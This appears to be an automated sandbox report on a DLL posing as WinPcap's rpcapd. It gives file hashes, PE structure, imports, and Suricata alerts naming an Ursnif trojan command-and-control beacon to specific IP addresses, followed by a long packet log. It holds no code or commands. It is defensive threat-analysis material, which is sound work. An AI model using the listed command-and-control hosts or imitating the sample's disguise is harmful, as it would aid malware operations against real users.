Encrypted: | false |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_e912ab21695e486193197883960c42688442ed7_7cac0383_1b24250e\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8482062576733173 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 41922 |
Entropy (8bit): | 1.9480086397048668 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8336 |
Entropy (8bit): | 3.697730021064886 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4598 |
Entropy (8bit): | 4.473891299554449 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 54966 |
Entropy (8bit): | 2.1904283410365792 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 42122 |
Entropy (8bit): | 1.9777565374307426 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8294 |
Entropy (8bit): | 3.696880610282114 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4564 |
Entropy (8bit): | 4.442194983388651 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8352 |
Entropy (8bit): | 3.69147029511001 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4665 |
Entropy (8bit): | 4.429165137940979 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.883977562702998 |
Encrypted: | false |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1192 |
Entropy (8bit): | 5.325275554903011 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1332 |
Entropy (8bit): | 3.9920012545315475 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1332 |
Entropy (8bit): | 4.00763306842418 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1053216887427664 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 417 |
Entropy (8bit): | 5.038440975503667 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 371 |
Entropy (8bit): | 5.249019234797919 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6530037012560004 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 868 |
Entropy (8bit): | 5.336626837702438 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KzNVE2WKaM5DqBVKVrdFAMBJTH:Akka6arE2WKxDcVKdBJj |
MD5: | DB810852324B71057176ED36F2CA1695 |
SHA1: | 713996E9A782D6855EE1478FD42E7805D09C4A93 |
SHA-256: | 5B22C0AB30D90381ADF759C4D158F834E885757D62A889E1EC714AE99875F44D |
SHA-512: | 79F2ED62FF95B48C4E1F26A2AF8845FE6BBFC0D7F69563C76E76C79C2DA3960068228164BF20AB849FC65B24298D950CB46FB36C7D83707ED812AE336AC41DBA |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.121923247223275 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0lyak7YnqqXlTPN5Dlq5J:+RI+ycuZhNXakSZPNnqX |
MD5: | 4B7B3DAD3367B7883885AE92CC2022A8 |
SHA1: | 4AB6E72835EF2BD6D9846FF139DE59289E97B3D1 |
SHA-256: | 969A0F960763778F331C1CFB2FF57CA4696E3A7EDAE689A3F0BD9F40A12D3C1F |
SHA-512: | 1E8AD8BFD152023AF10B6D9A725282C1FD2CFAA6172E575B66471D6D695991B915BBF5DFB571C47E2DE640F1E8D7EB39B502B12A359A7038A8BEF90DCAE3094B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 411 |
Entropy (8bit): | 5.082169696837192 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy |
MD5: | 248E15CD19191D4333303E0E1F8E9A70 |
SHA1: | 9896EF9708F81AE4E3F2CA86329AD6BD82C700C3 |
SHA-256: | 0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF |
SHA-512: | 8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 371 |
Entropy (8bit): | 5.302952125242329 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923filzxs7+AEszI923fiW9n:p37Lvkmb6KzKWZE2B9 |
MD5: | 4023D8D689AEED7AD6BA5A8D55E73792 |
SHA1: | 624E325D40A40C0E16FDC537DB9A1E37319394F2 |
SHA-256: | 128109BC2099C5A84A35768FA9F4A64DBF7920B09E1BE9312703554DC63FCD10 |
SHA-512: | F63FE1FD497662D350C1A921600CE34A6088258938A6809A5EBC2C00275F81351E6922CDCBFF65891B5DD376865C8531E0D15FDFE7E3526530AAFA7385B7223C |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6409513225199364 |
Encrypted: | false |
SSDEEP: | 24:etGSK8+mUE7R853RY0kCG7J+4I4tkZfHqug3DZ0WI+ycuZhNXakSZPNnq:6EXE7S50WJHq3ZX1ulXa3bq |
MD5: | 67D7212A2B15084D3B6FA70F16AFDD6C |
SHA1: | 743A096BCF4E42AB064F5139488194811EF23782 |
SHA-256: | 878B7E2B251C062F95F45B18FE7248D95EA378707CFDFFB0A6043B134B463761 |
SHA-512: | 992DB5E31B77859DC273C344444A5A93963F16BA9796F261197E2D4F9FBF6AC194DD29A7261D5A53A2BE79226F9E547E1D7EEF0456EC50CAEAF1ACFDE033F848 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 868 |
Entropy (8bit): | 5.35568353482419 |
Encrypted: | false |
SSDEEP: | 12:xKIR37Lvkmb6KzKWZE2B4KaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KzrE2WKaM5DqBVKVrdFAMBJTH |
MD5: | D8D7A68D20996F61BC72BD192FB1D83C |
SHA1: | 92F7412CE0E44D88FEE4D91B1003D435385BF7EE |
SHA-256: | 1D14F98EF405654C358851C49324CDBD3FABAE5F2213B38D652C01CE24AA01B4 |
SHA-512: | A51C5EC8636040C299D6F6A2E8053B47AC6EF5B3830CE875257F27FC98448FC9195A317E723A793B0115E091BA49A3056667FA8E3605D89B97FA3B10599BFA9F |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220422\PowerShell_transcript.701188.6Ui9L_aX.20220422181317.txt
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1357 |
Entropy (8bit): | 5.3549203065751 |
Encrypted: | false |
SSDEEP: | 24:BxSABDvBBRJNzx2DOXUWndxSXLCHgo4qWnHjeTKKjX4CIym1ZJXLdxSXLCHgo4Ui:BZJv/TZoO9pb4tnqDYB1Zvpb4iZZ+ |
MD5: | 8F2C181896931A924F0038005408C3D7 |
SHA1: | DB9E8BEF4B235EE727DB7754F9B8884403C420CB |
SHA-256: | FF8A78A7E137AE094866B5F6C45363A3AFDC5E3E7069033961BFCC760ED2B1DF |
SHA-512: | 634578FD917A2633DD4E58F706DC141E71BE8B88E56724D05817BE8AACA4951376C6E1A8054FC2F7864E8A6D9E16A97496DCAD6196A6121A871BC09D6DB193B0 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.116107290295018 |
TrID: |
|
File name: | nhLAwAo49f.dll |
File size: | 641494 |
MD5: | 117d2886bf0e722b91c0613f337e97da |
SHA1: | ca858266bb3a6c30bd798bd52ec9ad5f5992c999 |
SHA256: | 5460cbecf56cf0527a162da6e9232c055912ae695990c1894a32b08055f45d37 |
SHA512: | bbbcef3522fbfac490a21803c5fab3968f18b5e9ed41db45f4617de4db016a11aae7a8c18ecf6bd189257e1a8e7cf0743d2bd1ecb5ccecf1af1160b4f69dbe2f |
SSDEEP: | 12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8Zlh:+w1lEKOpuYxiwkkgjAN8Z/ |
TLSH: | ABD4BD1A029B2102EBB6CE78A751636C55170CE09B01E2CFC9190DA395E35FBF4FA5ED |
File Content Preview: | MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{....................... |
Icon Hash: | 74f0e4ecccdce0e4 |
Entrypoint: | 0x401023 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | fd1c62e6f93e304a27347077f6d2b44c |
Signature Valid: | |
Signature Issuer: | |
Signature Validation Error: | |
Error Number: | |
Not Before, Not After | |
Subject Chain | |
Version: | |
Thumbprint MD5: | |
Thumbprint SHA-1: | |
Thumbprint SHA-256: | |
Serial: |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x97000 | 0xc8 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x703 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99000 | 0x46b8 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x41001 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9731c | 0x254 | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x3f170 | 0x40000 | False | 0.371898651123 | data | 4.44682748237 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x41000 | 0x4001b | 0x41000 | False | 0.805322265625 | data | 7.15716511851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x82000 | 0x14957 | 0x12000 | False | 0.179578993056 | data | 5.40188601701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.idata | 0x97000 | 0xadd | 0x1000 | False | 0.217041015625 | data | 2.64887682924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x98000 | 0x703 | 0x1000 | False | 0.1220703125 | data | 1.10395588442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x99000 | 0x53a5 | 0x6000 | False | 0.152099609375 | data | 5.13419580461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_VERSION | 0x98170 | 0x3d0 | data |
DLL | Import |
---|---|
WINSPOOL.DRV | GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification |
msvcrt.dll | toupper |
USER32.dll | DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW |
OLEAUT32.dll | LHashValOfNameSysA |
SHELL32.dll | FindExecutableW |
KERNEL32.dll | lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA |
Secur32.dll | InitializeSecurityContextW |
ADVAPI32.dll | GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner |
GDI32.dll | GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW |
Description | Data |
---|---|
LegalCopyright | Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino. |
InternalName | rpcapd |
FileVersion | 4.0.0.1040 |
CompanyName | CACE Technologies |
LegalTrademarks | |
ProductName | WinPcap |
ProductVersion | 4.0.0.1040 |
FileDescription | Remote Packet Capture Daemon |
Build Description | |
OriginalFilename | rpcapd.exe |
Translation | 0x0000 0x04b0 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/22/22-18:13:04.407179 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
04/22/22-18:12:43.292918 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49758 | 80 | 192.168.2.5 | 13.107.42.16 |
04/22/22-18:13:05.383399 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
04/22/22-18:13:03.616504 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 22, 2022 18:13:04.317192078 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.317239046 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317251921 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317266941 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317267895 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.317285061 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317298889 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317368984 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317398071 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.317464113 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317481041 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317492962 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317506075 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.317545891 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.317677021 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.341089964 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.341150045 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.356317997 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356352091 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356364012 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356381893 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356443882 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.356499910 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.356822014 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356841087 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356853008 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356870890 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.356875896 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.356923103 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357080936 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357110023 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357122898 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357126951 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357137918 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357153893 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357165098 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357166052 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357192993 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357391119 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357409000 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357419968 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357435942 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357446909 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357506037 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357508898 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357511997 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357518911 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357549906 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357709885 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357729912 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357739925 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357760906 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357786894 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.357871056 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.357917070 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.407179117 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.430794001 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795639992 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795674086 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795690060 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795716047 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795741081 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795758009 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795792103 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.795862913 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795862913 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.795916080 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795923948 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.795934916 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.795968056 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.795999050 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.796025038 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.796041012 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.796082020 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.796171904 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.796192884 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.796228886 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.796242952 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836237907 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836298943 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836314917 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836338043 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836357117 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836363077 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836381912 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836390972 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836406946 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836424112 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836441994 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836447954 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836469889 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836472988 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836488008 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836505890 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836512089 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836536884 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836541891 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836553097 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836561918 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836577892 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836595058 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836601973 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836617947 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836623907 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836659908 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836749077 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836783886 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.836807013 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.836837053 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
